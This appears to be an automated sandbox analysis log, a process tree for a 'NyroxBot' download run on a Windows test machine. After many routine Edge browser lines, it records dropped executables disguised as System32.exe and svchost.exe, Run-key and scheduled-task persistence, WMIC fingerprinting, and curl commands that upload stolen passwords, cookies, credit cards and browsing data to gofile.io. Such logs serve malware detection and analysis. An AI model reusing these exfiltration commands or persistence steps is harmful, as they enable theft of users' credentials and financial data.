  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
  2⤵
  PID:1068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
  2⤵
  PID:3952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4204 /prefetch:1
  2⤵
  PID:664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:1
  2⤵
  PID:804
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4344 /prefetch:8
  2⤵
  PID:4004
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4344 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3992 /prefetch:1
  2⤵
  PID:808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1
  2⤵
  PID:5068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
  2⤵
  PID:216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4012 /prefetch:1
  2⤵
  PID:4924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
  2⤵
  PID:3232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4176 /prefetch:1
  2⤵
  PID:2108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
  2⤵
  PID:2840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1
  2⤵
  PID:2492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5796 /prefetch:8
  2⤵
  PID:2544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5836 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:1736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3992 /prefetch:1
  2⤵
  PID:1852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
  2⤵
  PID:4924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:1
  2⤵
  PID:3248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1
  2⤵
  PID:2520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6660 /prefetch:1
  2⤵
  PID:1588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:1
  2⤵
  PID:3300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
  2⤵
  PID:5112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1704 /prefetch:1
  2⤵
  PID:376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6428 /prefetch:1
  2⤵
  PID:1472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2100 /prefetch:1
  2⤵
  PID:2120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
  2⤵
  PID:2572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7044 /prefetch:1
  2⤵
  PID:3656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=7344 /prefetch:8
  2⤵
  PID:1008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7852 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4136 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3264

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4756

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2836

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3932

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\NyroxBot\" -ad -an -ai#7zMap13145:78:7zEvent19029
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2516

C:\Users\Admin\Downloads\NyroxBot\NyroxMain\NyroxV1.2.EXE
"C:\Users\Admin\Downloads\NyroxBot\NyroxMain\NyroxV1.2.EXE"
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2596
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\NYROXV~1.EXE
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\NYROXV~1.EXE
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:3708
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\FOLLOW~1.EXE
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\FOLLOW~1.EXE
    3⤵
    - Executes dropped EXE
    PID:4160
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\FOLLOW~1.EXE
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\FOLLOW~1.EXE
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2128
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\DMMEIF~1.EXE
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\DMMEIF~1.EXE
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:2196
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe
      4⤵
      Executes dropped EXE
      PID:4652
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2288
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:2408
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
        6⤵
        
        PID:4832
        
        C:\Windows\SysWOW64\wbem\WMIC.exe
        
        C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3324
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\EPICGA~1.EXE
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\EPICGA~1.EXE
      4⤵
      Executes dropped EXE
      PID:3284
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\EPICGA~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\EPICGA~1.EXE
        5⤵
        Drops startup file
        Executes dropped EXE
        
        PID:372
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:3048
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store8.gofile.io/uploadFile"
        6⤵
        
        PID:3020
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store8.gofile.io/uploadFile
        7⤵
        
        PID:3964
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store8.gofile.io/uploadFile"
        6⤵
        
        PID:1124
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store8.gofile.io/uploadFile
        7⤵
        
        PID:3316
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store8.gofile.io/uploadFile"
        6⤵
        
        PID:464
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store8.gofile.io/uploadFile
        7⤵
        
        PID:3980
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store8.gofile.io/uploadFile"
        6⤵
        
        PID:3956
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store8.gofile.io/uploadFile
        7⤵
        
        PID:4804
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store8.gofile.io/uploadFile"
        6⤵
        
        PID:3048
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store8.gofile.io/uploadFile
        7⤵
        
        PID:4552
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store8.gofile.io/uploadFile"
        6⤵
        
        PID:2440
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store8.gofile.io/uploadFile
        7⤵
        
        PID:4936
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WINDOW~1.EXE
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WINDOW~1.EXE
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:1740
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\System32.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\System32.exe
    3⤵
    - Executes dropped EXE
    PID:2576
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\System32.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\System32.exe
      4⤵
      Executes dropped EXE
      PID:1208
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\svchost.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\svchost.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:1520
  - - C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe
      "C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe"
      4⤵
      Executes dropped EXE
      PID:1524
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /Create /TN "Intel Processor ©" /XML "C:\Users\Admin\AppData\Local\Temp\tmpA970.tmp" /F
        5⤵
        Creates scheduled task(s)
        
        PID:960

C:\Users\Admin\Downloads\NyroxBot\NyroxMain\NyroxV1.2.EXE
"C:\Users\Admin\Downloads\NyroxBot\NyroxMain\NyroxV1.2.EXE"
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2136
- C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\NYROXV~1.EXE
  C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\NYROXV~1.EXE
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:3020
- - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\FOLLOW~1.EXE
    C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\FOLLOW~1.EXE
    3⤵
    - Executes dropped EXE
    PID:4052
  - - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\FOLLOW~1.EXE
      C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\FOLLOW~1.EXE
      4⤵
      Executes dropped EXE
      PID:1736
- - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\DMMEIF~1.EXE
    C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\DMMEIF~1.EXE
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:3516
  - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\System32.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\System32.exe
      4⤵
      Executes dropped EXE
      PID:916
    - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\System32.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\System32.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2004
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:3368
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
        6⤵
        
        PID:2516
        
        C:\Windows\SysWOW64\wbem\WMIC.exe
        
        C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5072
  - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\EPICGA~1.EXE
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\EPICGA~1.EXE
      4⤵
      Executes dropped EXE
      PID:1740
    - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\EPICGA~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\EPICGA~1.EXE
        5⤵
        Drops startup file
        Executes dropped EXE
        
        PID:2448
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:816
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store2.gofile.io/uploadFile"
        6⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store2.gofile.io/uploadFile
        7⤵
        
        PID:4976
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store2.gofile.io/uploadFile"
        6⤵
        
        PID:3180
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store2.gofile.io/uploadFile
        7⤵
        
        PID:1356
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store2.gofile.io/uploadFile"
        6⤵
        
        PID:2552
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store2.gofile.io/uploadFile
        7⤵
        
        PID:3904
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store2.gofile.io/uploadFile"
        6⤵
        
        PID:3708
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store2.gofile.io/uploadFile
        7⤵
        
        PID:4308
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store2.gofile.io/uploadFile"
        6⤵
        
        PID:2264
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store2.gofile.io/uploadFile
        7⤵
        
        PID:2288
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store2.gofile.io/uploadFile"
        6⤵
        
        PID:4612
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store2.gofile.io/uploadFile
        7⤵
        
        PID:4932
- C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\WINDOW~1.EXE
  C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\WINDOW~1.EXE
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:3964
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\System32.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\System32.exe
    3⤵
    - Executes dropped EXE
    PID:4776
  - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\System32.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\System32.exe
      4⤵
      Executes dropped EXE
      PID:5044
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\svchost.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\svchost.exe
    3⤵
    - Executes dropped EXE
    PID:1760

C:\Users\Admin\Downloads\NyroxBot\NyroxMain\NyroxV1.2.EXE
"C:\Users\Admin\Downloads\NyroxBot\NyroxMain\NyroxV1.2.EXE"
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:464
- C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\NYROXV~1.EXE
  C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\NYROXV~1.EXE
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:2536
- - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FOLLOW~1.EXE
    C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FOLLOW~1.EXE
    3⤵
    - Executes dropped EXE
    PID:3916
  - - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FOLLOW~1.EXE
      C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FOLLOW~1.EXE
      4⤵
      Executes dropped EXE
      PID:372
- - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\DMMEIF~1.EXE
    C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\DMMEIF~1.EXE
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:3100
  - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\System32.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\System32.exe
      4⤵
      Executes dropped EXE
      PID:3236
    - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\System32.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\System32.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4444
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:844
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
        6⤵
        
        PID:4996
        
        C:\Windows\SysWOW64\wbem\WMIC.exe
        
